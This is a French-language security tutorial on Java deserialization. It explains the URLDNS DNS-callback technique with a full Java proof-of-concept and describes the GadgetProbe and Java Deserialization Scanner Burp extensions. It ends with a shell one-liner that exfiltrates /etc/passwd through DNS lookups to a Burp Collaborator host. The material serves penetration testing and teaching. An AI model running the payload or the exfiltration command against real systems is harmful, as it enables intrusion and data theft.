Java DNS Deserialization, GadgetProbe et Java Deserialization Scanner

Reading time: 7 minutes

Requête DNS sur la désérialisation

La classe java.net.URL implémente Serializable, cela signifie que cette classe peut être sérialisée.

public final class URL implements java.io.Serializable {

Cette classe a un comportement curieux. D'après la documentation : “Deux hôtes sont considérés comme équivalents si les deux noms d'hôtes peuvent être résolus en les mêmes adresses IP”.
Alors, chaque fois qu'un objet URL appelle n'importe laquelle des fonctions equals ou hashCode, une demande DNS pour obtenir l'adresse IP va être envoyée.

Appeler la fonction hashCode d'un objet URL est assez facile, il suffit d'insérer cet objet dans un HashMap qui va être désérialisé. Cela est dû au fait qu'à la fin de la fonction readObject de HashMap, ce code est exécuté :

private void readObject(java.io.ObjectInputStream s)
throws IOException, ClassNotFoundException {
[   ...   ]
for (int i = 0; i < mappings; i++) {
[   ...   ]
putVal(hash(key), key, value, false, false);
}

Il va exécuter putVal avec chaque valeur à l'intérieur du HashMap. Mais, plus pertinent est l'appel à hash avec chaque valeur. Voici le code de la fonction hash :

static final int hash(Object key) {
int h;
return (key == null) ? 0 : (h = key.hashCode()) ^ (h >>> 16);
}

Comme vous pouvez l'observer, lors de la désérialisation d'un HashMap, la fonction hash va être exécutée avec chaque objet et pendant l'exécution de hash, .hashCode() de l'objet va être exécuté. Par conséquent, si vous désérialisez un HashMap contenant un objet URL, l'objet URL va exécuter .hashCode().

Maintenant, examinons le code de URLObject.hashCode() :

public synchronized int hashCode() {
if (hashCode != -1)
return hashCode;

hashCode = handler.hashCode(this);
return hashCode;

Comme vous pouvez le voir, lorsqu'un URLObject exécute .hashCode(), il appelle hashCode(this). Une continuation, vous pouvez voir le code de cette fonction :

protected int hashCode(URL u) {
int h = 0;

// Generate the protocol part.
String protocol = u.getProtocol();
if (protocol != null)
h += protocol.hashCode();

// Generate the host part.
InetAddress addr = getHostAddress(u);
[   ...   ]

Vous pouvez voir qu'un getHostAddress est exécuté sur le domaine, lancant une requête DNS.

Par conséquent, cette classe peut être abusée afin de lancer une requête DNS pour démontrer que la désérialisation est possible, ou même pour exfiltrer des informations (vous pouvez ajouter en sous-domaine la sortie d'une exécution de commande).

Exemple de code de payload URLDNS

Vous pouvez trouver le code de payload URDNS de ysoserial ici. Cependant, juste pour faciliter la compréhension de la façon de le coder, j'ai créé mon propre PoC (basé sur celui de ysoserial) :

import java.io.File;
import java.io.FileInputStream;
import java.io.FileOutputStream;
import java.io.IOException;
import java.io.ObjectInputStream;
import java.io.ObjectOutputStream;
import java.lang.reflect.Field;
import java.net.InetAddress;
import java.net.URLConnection;
import java.net.URLStreamHandler;
import java.util.HashMap;
import java.net.URL;

public class URLDNS {
public static void GeneratePayload(Object instance, String file)
throws Exception {
//Serialize the constructed payload and write it to the file
File f = new File(file);
ObjectOutputStream out = new ObjectOutputStream(new FileOutputStream(f));
out.writeObject(instance);
out.flush();
out.close();
}
public static void payloadTest(String file) throws Exception {
//Read the written payload and deserialize it
ObjectInputStream in = new ObjectInputStream(new FileInputStream(file));
Object obj = in.readObject();
System.out.println(obj);
in.close();
}

public static void main(final String[] args) throws Exception {
String url = "http://3tx71wjbze3ihjqej2tjw7284zapye.burpcollaborator.net";
HashMap ht = new HashMap(); // HashMap that will contain the URL
URLStreamHandler handler = new SilentURLStreamHandler();
URL u = new URL(null, url, handler); // URL to use as the Key
ht.put(u, url); //The value can be anything that is Serializable, URL as the key is what triggers the DNS lookup.

// During the put above, the URL's hashCode is calculated and cached.
// This resets that so the next time hashCode is called a DNS lookup will be triggered.
final Field field = u.getClass().getDeclaredField("hashCode");
field.setAccessible(true);
field.set(u, -1);

//Test the payloads
GeneratePayload(ht, "C:\\Users\\Public\\payload.serial");
}
}


class SilentURLStreamHandler extends URLStreamHandler {

protected URLConnection openConnection(URL u) throws IOException {
return null;
}

protected synchronized InetAddress getHostAddress(URL u) {
return null;
}
}

Plus d'informations

• https://blog.paranoidsoftware.com/triggering-a-dns-lookup-using-java-deserialization/
• Dans l'idée originale, la charge utile des commons collections a été modifiée pour effectuer une requête DNS, ce qui était moins fiable que la méthode proposée, mais voici le post : https://www.gosecure.net/blog/2017/03/22/detecting-deserialization-bugs-with-dns-exfiltration/

GadgetProbe

Vous pouvez télécharger GadgetProbe depuis le Burp Suite App Store (Extender).

GadgetProbe essaiera de déterminer si certaines classes Java existent sur la classe Java du serveur afin que vous puissiez savoir si elle est vulnérable à une exploitation connue.

Comment ça fonctionne

GadgetProbe utilisera la même charge utile DNS de la section précédente mais avant d'exécuter la requête DNS, il essaiera de désérialiser une classe arbitraire. Si la classe arbitraire existe, la requête DNS sera envoyée et GadgetProbe notera que cette classe existe. Si la requête DNS n'est jamais envoyée, cela signifie que la classe arbitraire n'a pas été désérialisée avec succès, donc soit elle n'est pas présente, soit elle n'est pas sérialisable/exploitable.

Dans le github, GadgetProbe a des listes de mots avec des classes Java à tester.

Plus d'informations

• https://know.bishopfox.com/research/gadgetprobe

Scanner de désérialisation Java

Ce scanner peut être téléchargé depuis le Burp App Store (Extender).
L'extension a des capacités passives et actives.

Passif

Par défaut, il vérifie passivement toutes les requêtes et réponses envoyées à la recherche de bytes magiques sérialisés Java et présentera un avertissement de vulnérabilité si l'un d'eux est trouvé :

Actif

Test manuel

Vous pouvez sélectionner une requête, faire un clic droit et Envoyer la requête à DS - Test manuel.
Ensuite, dans l'onglet Deserialization Scanner --> onglet Test manuel, vous pouvez sélectionner le point d'insertion. Et lancer le test (Sélectionnez l'attaque appropriée en fonction de l'encodage utilisé).

Même si cela s'appelle "Test manuel", c'est assez automatisé. Il vérifiera automatiquement si la désérialisation est vulnérable à n'importe quelle charge utile ysoserial en vérifiant les bibliothèques présentes sur le serveur web et mettra en évidence celles qui sont vulnérables. Pour vérifier les bibliothèques vulnérables, vous pouvez choisir de lancer Javas Sleeps, sleeps via consommation CPU, ou en utilisant DNS comme cela a été mentionné précédemment.

Exploitation

Une fois que vous avez identifié une bibliothèque vulnérable, vous pouvez envoyer la requête à l'onglet Exploitation.
Dans cet onglet, vous devez sélectionner à nouveau le point d'injection, écrire la bibliothèque vulnérable pour laquelle vous souhaitez créer une charge utile, et la commande. Ensuite, appuyez simplement sur le bouton Attaque approprié.

Informations sur l'exfiltration DNS de désérialisation Java

Faites en sorte que votre charge utile exécute quelque chose comme ce qui suit :

(i=0;tar zcf - /etc/passwd | xxd -p -c 31 | while read line; do host $line.$i.cl1k22spvdzcxdenxt5onx5id9je73.burpcollaborator.net;i=$((i+1)); done)

Plus d'informations

• https://techblog.mediaservice.net/2017/05/reliable-discovery-and-exploitation-of-java-deserialization-vulnerabilities/